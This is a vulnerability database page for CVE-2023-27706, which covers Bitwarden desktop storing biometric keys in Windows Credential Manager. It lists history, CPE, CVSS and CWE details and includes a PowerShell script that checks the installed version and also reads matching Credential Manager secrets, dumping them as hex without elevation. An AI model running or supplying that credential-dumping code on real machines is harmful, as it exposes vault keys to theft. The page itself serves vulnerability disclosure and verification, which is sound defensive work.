CVE-2023-27706

Bitwarden Windows desktop application versions prior to v2023.4.0 store biometric keys in Windows Credential Manager, accessible to other local unprivileged processes.
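The description above names the weakness but not how a practitioner would confirm it on a host. The following PowerShell is an added example written for this page; it is not Bitwarden's code and not from the HackerOne report. It does two things: compares the installed desktop build against the fixed version 2023.4.0, and reads a Windows Credential Manager generic credential back through the Win32 CredRead API from an ordinary, non-elevated process, which is exactly the exposure the description refers to. The install path, the "Bitwarden" substring used to pick out the credential, and the decision to report the blob as hex are assumptions, not facts stated on the page; the real target name is defined in the desktop_native source linked in the history below.

```powershell
# Added example for CVE-2023-27706 (not Bitwarden's code, not from the advisory).
# Step 1: version check against the fixed release named on the page.
# Step 2: demonstrate that a Credential Manager generic credential is readable in
#         cleartext by any process in the same user session, with no elevation.
# ASSUMPTIONS: $ExePath is the default per-user install location (may differ);
# the 'Bitwarden' filter string is a guess at the credential target name.

$FixedVersion = [version]'2023.4.0'
$ExePath = Join-Path $env:LOCALAPPDATA 'Programs\Bitwarden\Bitwarden.exe'   # assumed path

function Test-BitwardenDesktopVulnerable {
    param([string]$Path = $ExePath)
    if (-not (Test-Path $Path)) { Write-Warning "Bitwarden desktop not found at $Path"; return $null }
    # ProductVersion is expected to look like "2023.4.0"; strip any trailing suffix before casting.
    $raw = (Get-Item $Path).VersionInfo.ProductVersion -replace '[^\d.].*$', ''
    $v = [version]$raw
    [pscustomobject]@{ Installed = $v; Fixed = $FixedVersion; Vulnerable = ($v -lt $FixedVersion) }
}

# Win32 CredRead/CredFree via P/Invoke. Credential Manager exposes this API to every
# process running as the user; that is why "other local unprivileged processes" can read the key.
Add-Type -Namespace Win32 -Name CredApi -MemberDefinition @'
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct CREDENTIAL {
    public uint Flags; public uint Type; public string TargetName; public string Comment;
    public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
    public uint CredentialBlobSize; public IntPtr CredentialBlob; public uint Persist;
    public uint AttributeCount; public IntPtr Attributes; public string TargetAlias; public string UserName;
}
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CredRead(string target, uint type, uint flags, out IntPtr credential);
[DllImport("advapi32.dll")]
public static extern bool CredFree(IntPtr buffer);
'@

function Find-CredentialTargets {
    # Enumerate stored credentials with the built-in cmdkey tool and keep the ones whose
    # target contains $Filter. Generic entries are listed as "LegacyGeneric:target=<name>";
    # CredRead wants only <name>, so that prefix is stripped.
    param([string]$Filter = 'Bitwarden')   # assumed substring
    cmdkey /list |
        Where-Object { $_ -match '^\s*Target:\s*(.+)$' } |
        ForEach-Object { $Matches[1].Trim() -replace '^LegacyGeneric:target=', '' } |
        Where-Object { $_ -like "*$Filter*" }
}

function Get-GenericCredentialBlob {
    # Read one generic credential and return its secret blob. Whether the blob is a usable
    # biometric key in cleartext is what the advisory asserts for builds before 2023.4.0;
    # this function only shows that the read itself needs no special privilege.
    param([Parameter(Mandatory)][string]$TargetName)
    $CRED_TYPE_GENERIC = 1
    $ptr = [IntPtr]::Zero
    if (-not [Win32.CredApi]::CredRead($TargetName, $CRED_TYPE_GENERIC, 0, [ref]$ptr)) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "CredRead failed for '$TargetName' (Win32 error $err)"
    }
    try {
        $cred = [Runtime.InteropServices.Marshal]::PtrToStructure($ptr, [type][Win32.CredApi+CREDENTIAL])
        $blob = New-Object byte[] ([int]$cred.CredentialBlobSize)
        if ($blob.Length -gt 0) {
            [Runtime.InteropServices.Marshal]::Copy($cred.CredentialBlob, $blob, 0, $blob.Length)
        }
        [pscustomobject]@{
            TargetName = $cred.TargetName
            UserName   = $cred.UserName
            BlobBytes  = $blob.Length
            BlobHex    = ($blob | ForEach-Object { $_.ToString('x2') }) -join ''   # encoding is app-specific
        }
    } finally {
        [void][Win32.CredApi]::CredFree($ptr)
    }
}

# Usage: run as the logged-in user, without "Run as administrator".
Test-BitwardenDesktopVulnerable
Find-CredentialTargets | ForEach-Object { Get-GenericCredentialBlob -TargetName $_ }
```

Run this as the same interactive user that unlocked the vault; running it elevated would prove nothing, since the point is that no elevation is needed. A non-empty blob on a build below 2023.4.0 is the condition the description calls out; on a fixed build a Credential Manager entry may still exist, so the version comparison, not the presence of an entry, is the deciding check here.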
Configurations

Configuration 1

cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:desktop:*:*:*

History

15 Aug 2023, 17:15

Type: Summary
Values Removed: Bitwarden Desktop v1.20.0 and above stores the biometric key in plaintext which allows a local attacker to decrypt the entire local vault.
Values Added: Bitwarden Windows desktop application versions prior to v2023.4.0 store biometric keys in Windows Credential Manager, accessible to other local unprivileged processes.

16 Jun 2023, 18:24

Type: CPE
Values Added: cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:desktop:*:*:*

Type: CVSS
Values Removed: v2 : unknown; v3 : unknown
Values Added: v2 : unknown; v3 : 7.1

Type: First Time
Values Added: Bitwarden; Bitwarden bitwarden

Type: References
Values Removed: (MISC) https://github.com/bitwarden/clients
Values Added: (MISC) https://github.com/bitwarden/clients - Product

Type: References
Values Removed: (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/biometric/windows.rs#L19
Values Added: (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/biometric/windows.rs#L19 - Product

Type: References
Values Removed: (MISC) https://hackerone.com/reports/1874155
Values Added: (MISC) https://hackerone.com/reports/1874155 - Exploit, Issue Tracking, Third Party Advisory

Type: References
Values Removed: (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/password/windows.rs#L16
Values Added: (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/password/windows.rs#L16 - Product

Type: CWE
Values Added: CWE-312

09 Jun 2023, 19:15

Type: New CVE

Information

Published : 2023-06-09 19:15

Updated : 2024-02-28 20:13


NVD link : CVE-2023-27706

Mitre link : CVE-2023-27706

CVE.ORG link : CVE-2023-27706



Products Affected

bitwarden

  • bitwarden
CWE
CWE-312: Cleartext Storage of Sensitive Information